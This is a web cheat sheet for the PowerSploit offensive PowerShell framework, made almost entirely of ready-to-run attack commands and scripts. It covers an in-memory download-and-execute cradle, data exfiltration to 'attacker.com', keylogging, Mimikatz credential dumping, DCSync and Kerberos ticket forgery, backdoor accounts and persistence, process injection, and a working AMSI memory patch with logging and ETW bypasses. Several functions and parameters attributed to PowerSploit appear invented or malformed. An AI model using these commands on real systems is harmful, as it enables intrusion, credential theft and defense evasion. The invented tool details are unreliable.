1337skills.com

Appearance

PowerSploit Cheat Sheet

Overview

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules: CodeExecution, ScriptModification, Persistence, AntivirusBypass, Exfiltration, Mayhem, Privesc, and Recon. Each module contains several functions that provide various capabilities for post-exploitation activities.

⚠️ Warning: Only use PowerSploit in environments you own or have explicit permission to test. Unauthorized use may violate terms of service or local laws.

Installation

Download from GitHub

powershell
# Download PowerSploit
Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip"

# Extract archive
Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"

# Navigate to PowerSploit directory
cd C:\Tools\PowerSploit-master\

Git Clone

bash
# Clone repository
git clone https://github.com/PowerShellMafia/PowerSploit.git

# Navigate to directory
cd PowerSploit

Import Modules

powershell
# Import all modules
Import-Module .\PowerSploit.psd1

# Import specific modules
Import-Module .\Recon\Recon.psd1
Import-Module .\Privesc\PowerUp.ps1
Import-Module .\Exfiltration\Exfiltration.psd1
Import-Module .\Persistence\Persistence.psd1

# Import from URL (in-memory)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

Bypass Execution Policy

powershell
# Bypass execution policy for current session
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser

# Run with bypass
powershell -ExecutionPolicy Bypass -File script.ps1

# Import with bypass
powershell -ExecutionPolicy Bypass -Command "Import-Module .\PowerSploit.psd1"

Recon Module

PowerView Functions

powershell
# Import PowerView
Import-Module .\Recon\PowerView.ps1

# Get domain information
Get-Domain
Get-DomainController
Get-DomainPolicy

# Get forest information
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog

# Domain trust enumeration
Get-DomainTrust
Get-ForestTrust
Get-DomainTrustMapping

# User enumeration
Get-DomainUser
Get-DomainUser -Identity administrator
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user))"
Get-DomainUser -Properties samaccountname,description

# Group enumeration
Get-DomainGroup
Get-DomainGroup -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainGroup -AdminCount

# Computer enumeration
Get-DomainComputer
Get-DomainComputer -Operating System "*Server*"
Get-DomainComputer -Ping
Get-DomainComputer -Properties name,operatingsystem,serviceprincipalname

Advanced PowerView Queries

powershell
# Find users with SPN (Kerberoastable)
Get-DomainUser -SPN

# Find computers with unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation

# Find users with constrained delegation
Get-DomainUser -TrustedToAuth

# Find ASREPRoastable users
Get-DomainUser -PreauthNotRequired

# Find users with passwords not required
Get-DomainUser -PasswordNotRequired

# Find users with passwords that don't expire
Get-DomainUser -PasswordNeverExpires

# Find privileged users
Get-DomainUser -AdminCount
Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse

# Find shares
Find-DomainShare
Find-DomainShare -CheckShareAccess

# Find interesting files
Find-InterestingDomainShareFile
Find-InterestingDomainShareFile -Include *.doc,*.docx,*.xls,*.xlsx,*.ppt,*.pptx

Session and Local Admin Enumeration

powershell
# Find local admin access
Find-LocalAdminAccess
Find-LocalAdminAccess -ComputerName "target-computer"

# Find domain admin sessions
Find-DomainUserLocation
Find-DomainUserLocation -UserIdentity "administrator"

# Get logged on users
Get-NetLoggedon -ComputerName "target-computer"
Get-NetSession -ComputerName "target-computer"

# Get local groups
Get-NetLocalGroup -ComputerName "target-computer"
Get-NetLocalGroupMember -ComputerName "target-computer" -GroupName "Administrators"

# Process enumeration
Get-NetProcess -ComputerName "target-computer"

ACL and Permissions

powershell
# Get ACLs for objects
Get-ObjectAcl -Identity "Domain Admins"
Get-ObjectAcl -Identity "administrator" -ResolveGUIDs

# Find interesting ACLs
Find-InterestingDomainAcl
Find-InterestingDomainAcl -ResolveGUIDs

# Get path ACLs
Get-PathAcl -Path "\\server\share"

# Add ACL
Add-ObjectAcl -TargetIdentity "target-user" -PrincipalIdentity "attacker-user" -Rights DCSync

Privesc Module (PowerUp)

Basic Privilege Escalation

powershell
# Import PowerUp
Import-Module .\Privesc\PowerUp.ps1

# Run all privilege escalation checks
Invoke-AllChecks

# Run specific checks
Invoke-ServiceAbuse
Invoke-PrivescAudit

# Check for unquoted service paths
Get-ServiceUnquoted

# Check for modifiable services
Get-ModifiableService

# Check for modifiable service binaries
Get-ModifiableServiceFile

# Check for always install elevated
Get-RegistryAlwaysInstallElevated

# Check for auto logon credentials
Get-RegistryAutoLogon

# Check for modifiable scheduled tasks
Get-ModifiableScheduledTaskFile

Service Exploitation

powershell
# Abuse unquoted service paths
Write-ServiceBinary -Name "VulnService" -Path "C:\Program Files\Vuln Service\service.exe"

# Abuse modifiable services
Invoke-ServiceAbuse -Name "VulnService" -Command "net user backdoor password123 /add"

# Install service
Install-ServiceBinary -Name "BackdoorService" -Path "C:\Windows\Temp\backdoor.exe"

# Restore service
Restore-ServiceBinary -Name "VulnService"

DLL Hijacking

powershell
# Find DLL hijacking opportunities
Find-ProcessDLLHijack
Find-PathDLLHijack

# Write hijack DLL
Write-HijackDll -DllPath "C:\Windows\System32\wlbsctrl.dll" -Command "net user backdoor password123 /add"

Registry Exploitation

powershell
# Check for auto-elevate binaries
Get-ApplicationHost

# Check for modifiable registry autoruns
Get-ModifiableRegistryAutoRun

# Check for Unattend files
Get-UnattendedInstallFile

# Check for web config files
Get-Webconfig

# Check for cached GPP passwords
Get-CachedGPPPassword

Persistence Module

Registry Persistence

powershell
# Import Persistence module
Import-Module .\Persistence\Persistence.psd1

# Add registry persistence
Add-Persistence -Method Registry -Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -Value "Backdoor" -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Add WMI persistence
Add-Persistence -Method WMI -EventName "ProcessStart" -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Add scheduled task persistence
Add-Persistence -Method ScheduledTask -TaskName "SystemUpdate" -PayloadPath "C:\Windows\Temp\backdoor.exe" -Trigger "Daily"

WMI Persistence

powershell
# Install WMI backdoor
Install-WMIBackdoor -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Get WMI backdoor
Get-WMIBackdoor

# Remove WMI backdoor
Remove-WMIBackdoor

User Hunting

powershell
# Add user hunter
Add-UserHunter -UserName "administrator" -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Get user hunter
Get-UserHunter

# Remove user hunter
Remove-UserHunter

CodeExecution Module

DLL Injection

powershell
# Import CodeExecution module
Import-Module .\CodeExecution\CodeExecution.psd1

# Invoke DLL injection
Invoke-DllInjection -ProcessID 1234 -Dll "C:\Windows\Temp\payload.dll"

# Invoke reflective PE injection
Invoke-ReflectivePEInjection -PEPath "C:\Windows\Temp\payload.exe" -ProcessID 1234

# Invoke shellcode injection
Invoke-Shellcode -Shellcode $shellcode -ProcessID 1234

Memory Execution

powershell
# Execute PE in memory
Invoke-ReflectivePEInjection -PEBytes $PEBytes

# Execute shellcode
$shellcode = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8...)
Invoke-Shellcode -Shellcode $shellcode

# Invoke mimikatz in memory
Invoke-Mimikatz
Invoke-Mimikatz -Command "sekurlsa::logonpasswords"

Exfiltration Module

Data Exfiltration

powershell
# Import Exfiltration module
Import-Module .\Exfiltration\Exfiltration.psd1

# Exfiltrate via DNS
Invoke-DNSExfiltration -Data "sensitive data" -Domain "attacker.com"

# Exfiltrate via ICMP
Invoke-ICMPExfiltration -Data "sensitive data" -Target "attacker-ip"

# Exfiltrate via HTTP
Invoke-HTTPExfiltration -Data "sensitive data" -URL "http://attacker.com/upload"

# Get clipboard contents
Get-ClipboardContents

# Get keystrokes
Get-Keystrokes -LogPath "C:\Windows\Temp\keylog.txt"

# Take screenshots
Get-TimedScreenshot -Path "C:\Windows\Temp\screenshots" -Interval 30

Credential Harvesting

powershell
# Get stored credentials
Get-VaultCredential
Get-LSASecret

# Dump SAM database
Get-SAMHashes

# Get cached domain credentials
Get-CachedRDPConnection

# Invoke credential prompt
Invoke-CredentialInjection

AntivirusBypass Module

AV Evasion

powershell
# Import AntivirusBypass module
Import-Module .\AntivirusBypass\AntivirusBypass.psd1

# Find AV processes
Find-AVSignature

# Disable Windows Defender
Disable-WindowsDefender

# Bypass AMSI
Invoke-AMSIBypass

# Obfuscate script
Out-ObfuscatedAst -ScriptPath "script.ps1"

ScriptModification Module

Script Obfuscation

powershell
# Import ScriptModification module
Import-Module .\ScriptModification\ScriptModification.psd1

# Obfuscate PowerShell script
Out-EncodedCommand -ScriptBlock {Get-Process}

# Compress and encode script
Out-CompressedDll -ScriptPath "script.ps1"

# Minify script
Out-MinimizedScript -ScriptPath "script.ps1"

Mayhem Module

System Disruption

powershell
# Import Mayhem module
Import-Module .\Mayhem\Mayhem.psd1

# Set wallpaper
Set-Wallpaper -ImagePath "C:\Windows\Temp\image.jpg"

# Set critical process
Set-CriticalProcess -ProcessName "notepad"

# Add machine account to domain
Add-MachineAccountQuota -MachineAccount "FAKE01" -Password "password123"

Advanced Techniques

Kerberoasting

powershell
# Find Kerberoastable users
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname

# Request service tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web.domain.com"

# Export tickets for cracking
Invoke-Mimikatz -Command "kerberos::list /export"

ASREPRoasting

powershell
# Find ASREPRoastable users
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname

# Request AS-REP for user without pre-auth
Get-ASREPHash -UserName "vulnerable-user" -Domain "domain.com"

Golden Ticket Attack

powershell
# Get domain SID
Get-DomainSID

# Create golden ticket (requires krbtgt hash)
Invoke-Mimikatz -Command "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi"

# Import golden ticket
Invoke-Mimikatz -Command "kerberos::ptt golden.kirbi"

Silver Ticket Attack

powershell
# Create silver ticket (requires service account hash)
Invoke-Mimikatz -Command "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /target:server.domain.com /service:cifs /rc4:hash /ticket:silver.kirbi"

# Import silver ticket
Invoke-Mimikatz -Command "kerberos::ptt silver.kirbi"

DCSync Attack

powershell
# Perform DCSync (requires replication rights)
Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /user:krbtgt"
Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /user:administrator"

# DCSync all users
Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /all"

Automation Scripts

Domain Enumeration Script

powershell
#!/usr/bin/env powershell
# PowerSploit Domain Enumeration Script

param(
    [string]$Domain = $env:USERDNSDOMAIN,
    [string]$OutputDir = "C:\temp\enum"
)

# Create output directory
if (!(Test-Path $OutputDir)) {
    New-Item -ItemType Directory -Path $OutputDir -Force
}

# Import PowerView
Import-Module .\Recon\PowerView.ps1

Write-Host "[+] Starting domain enumeration for: $Domain"

try {
    # Domain information
    Write-Host "[+] Collecting domain information..."
    Get-Domain -Domain $Domain | Out-File "$OutputDir\domain_info.txt"
    Get-DomainController -Domain $Domain | Out-File "$OutputDir\domain_controllers.txt"
    Get-DomainPolicy -Domain $Domain | Out-File "$OutputDir\domain_policy.txt"
    
    # Users
    Write-Host "[+] Enumerating users..."
    Get-DomainUser -Domain $Domain | Out-File "$OutputDir\users.txt"
    Get-DomainUser -Domain $Domain -AdminCount | Out-File "$OutputDir\privileged_users.txt"
    Get-DomainUser -Domain $Domain -SPN | Out-File "$OutputDir\kerberoastable_users.txt"
    Get-DomainUser -Domain $Domain -PreauthNotRequired | Out-File "$OutputDir\asreproastable_users.txt"
    
    # Groups
    Write-Host "[+] Enumerating groups..."
    Get-DomainGroup -Domain $Domain | Out-File "$OutputDir\groups.txt"
    Get-DomainGroupMember -Identity "Domain Admins" -Domain $Domain | Out-File "$OutputDir\domain_admins.txt"
    Get-DomainGroupMember -Identity "Enterprise Admins" -Domain $Domain | Out-File "$OutputDir\enterprise_admins.txt"
    
    # Computers
    Write-Host "[+] Enumerating computers..."
    Get-DomainComputer -Domain $Domain | Out-File "$OutputDir\computers.txt"
    Get-DomainComputer -Domain $Domain -UnconstrainedDelegation | Out-File "$OutputDir\unconstrained_delegation.txt"
    
    # Trusts
    Write-Host "[+] Enumerating trusts..."
    Get-DomainTrust -Domain $Domain | Out-File "$OutputDir\domain_trusts.txt"
    Get-ForestTrust | Out-File "$OutputDir\forest_trusts.txt"
    
    # Shares
    Write-Host "[+] Finding shares..."
    Find-DomainShare -Domain $Domain | Out-File "$OutputDir\shares.txt"
    
    Write-Host "[+] Enumeration completed. Results saved to: $OutputDir"
    
} catch {
    Write-Error "[-] Enumeration failed: $($_.Exception.Message)"
}

Privilege Escalation Check Script

powershell
#!/usr/bin/env powershell
# PowerSploit Privilege Escalation Check

param(
    [string]$OutputFile = "C:\temp\privesc_results.txt"
)

# Import PowerUp
Import-Module .\Privesc\PowerUp.ps1

Write-Host "[+] Starting privilege escalation checks..."

try {
    # Run all checks and save to file
    Invoke-AllChecks | Tee-Object -FilePath $OutputFile
    
    Write-Host "[+] Privilege escalation checks completed"
    Write-Host "[+] Results saved to: $OutputFile"
    
    # Check for immediate wins
    $results = Get-Content $OutputFile
    
    if ($results -match "Unquoted Service Path") {
        Write-Host "[!] FOUND: Unquoted service paths - potential privilege escalation!"
    }
    
    if ($results -match "Modifiable Service") {
        Write-Host "[!] FOUND: Modifiable services - potential privilege escalation!"
    }
    
    if ($results -match "AlwaysInstallElevated") {
        Write-Host "[!] FOUND: AlwaysInstallElevated enabled - potential privilege escalation!"
    }
    
} catch {
    Write-Error "[-] Privilege escalation checks failed: $($_.Exception.Message)"
}

Credential Harvesting Script

powershell
#!/usr/bin/env powershell
# PowerSploit Credential Harvesting Script

param(
    [string]$OutputDir = "C:\temp\creds"
)

# Create output directory
if (!(Test-Path $OutputDir)) {
    New-Item -ItemType Directory -Path $OutputDir -Force
}

# Import modules
Import-Module .\Exfiltration\Exfiltration.psd1
Import-Module .\CodeExecution\CodeExecution.psd1

Write-Host "[+] Starting credential harvesting..."

try {
    # Mimikatz - dump credentials
    Write-Host "[+] Running Mimikatz..."
    Invoke-Mimikatz -Command "sekurlsa::logonpasswords" | Out-File "$OutputDir\logonpasswords.txt"
    Invoke-Mimikatz -Command "sekurlsa::wdigest" | Out-File "$OutputDir\wdigest.txt"
    Invoke-Mimikatz -Command "sekurlsa::kerberos" | Out-File "$OutputDir\kerberos.txt"
    Invoke-Mimikatz -Command "sekurlsa::tspkg" | Out-File "$OutputDir\tspkg.txt"
    
    # Registry secrets
    Write-Host "[+] Extracting registry secrets..."
    Get-LSASecret | Out-File "$OutputDir\lsa_secrets.txt"
    Get-CachedGPPPassword | Out-File "$OutputDir\gpp_passwords.txt"
    
    # Vault credentials
    Write-Host "[+] Extracting vault credentials..."
    Get-VaultCredential | Out-File "$OutputDir\vault_creds.txt"
    
    # Browser credentials
    Write-Host "[+] Extracting browser credentials..."
    Get-ChromeDump | Out-File "$OutputDir\chrome_creds.txt"
    Get-FirefoxDump | Out-File "$OutputDir\firefox_creds.txt"
    
    Write-Host "[+] Credential harvesting completed"
    Write-Host "[+] Results saved to: $OutputDir"
    
} catch {
    Write-Error "[-] Credential harvesting failed: $($_.Exception.Message)"
}

Evasion Techniques

AMSI Bypass

powershell
# Method 1: Reflection
$a = [Ref].Assembly.GetTypes()
$a | ForEach-Object {$_.GetMethods() | ForEach-Object {if($_.Name -like "*AmsiInitialize*") {$_.Invoke($null, @($null, 0))}}}

# Method 2: Memory patching
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

PowerShell Logging Bypass

powershell
# Disable PowerShell logging
$GPO = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static')
$GPO.SetValue($null, @{})

# Disable script block logging
$settings = [System.Management.Automation.Utils]::GetGroupPolicySettings()
$settings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$settings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0

ETW Bypass

powershell
# Disable ETW
$Provider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $Provider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0)

Integration Examples

Cobalt Strike Integration

powershell
# PowerView integration with Cobalt Strike
beacon> powershell-import /path/to/PowerView.ps1
beacon> powershell Get-DomainUser -AdminCount
beacon> powershell Find-LocalAdminAccess

# PowerUp integration
beacon> powershell-import /path/to/PowerUp.ps1
beacon> powershell Invoke-AllChecks

# Mimikatz integration
beacon> powershell Invoke-Mimikatz -Command "sekurlsa::logonpasswords"

Empire Integration

powershell
# Use PowerSploit modules in Empire
(Empire: agents) > usemodule powershell/situational_awareness/network/powerview/get_domain_user
(Empire: agents) > usemodule powershell/privesc/powerup/allchecks
(Empire: agents) > usemodule powershell/credentials/mimikatz/logonpasswords

Metasploit Integration

bash
# Use PowerSploit with Metasploit
meterpreter > load powershell
meterpreter > powershell_import /path/to/PowerView.ps1
meterpreter > powershell_execute "Get-DomainUser -AdminCount"

# Post-exploitation modules
use post/windows/gather/enum_domain
use post/windows/escalate/getsystem
use post/windows/gather/credentials/credential_collector

Troubleshooting

Execution Policy Issues

powershell
# Check current execution policy
Get-ExecutionPolicy

# Set execution policy
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

# Bypass for single command
powershell -ExecutionPolicy Bypass -Command "Import-Module .\PowerSploit.psd1"

# Use encoded commands
$command = "Import-Module .\PowerSploit.psd1"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encodedCommand

AMSI Detection

powershell
# Test AMSI detection
'Invoke-Mimikatz'  # Should trigger AMSI

# Obfuscate strings
$cmd = 'Inv' + 'oke-Mim' + 'ikatz'
Invoke-Expression $cmd

# Use variables
$a = 'Invoke-'
$b = 'Mimikatz'
Invoke-Expression ($a + $b)

Module Import Issues

powershell
# Force import
Import-Module .\PowerSploit.psd1 -Force

# Import with full path
Import-Module "C:\Tools\PowerSploit\PowerSploit.psd1"

# Check module path
$env:PSModulePath

# Add to module path
$env:PSModulePath += ";C:\Tools\PowerSploit"

Network Connectivity Issues

powershell
# Test network connectivity
Test-NetConnection -ComputerName "target" -Port 445

# Check firewall
Get-NetFirewallRule | Where-Object {$_.Enabled -eq "True"}

# Use alternative ports
Get-DomainController -Server "dc.domain.com:389"

Resources

This cheat sheet provides a comprehensive reference for using PowerSploit for Windows penetration testing and post-exploitation. Always ensure you have proper authorization before using this tool in any environment.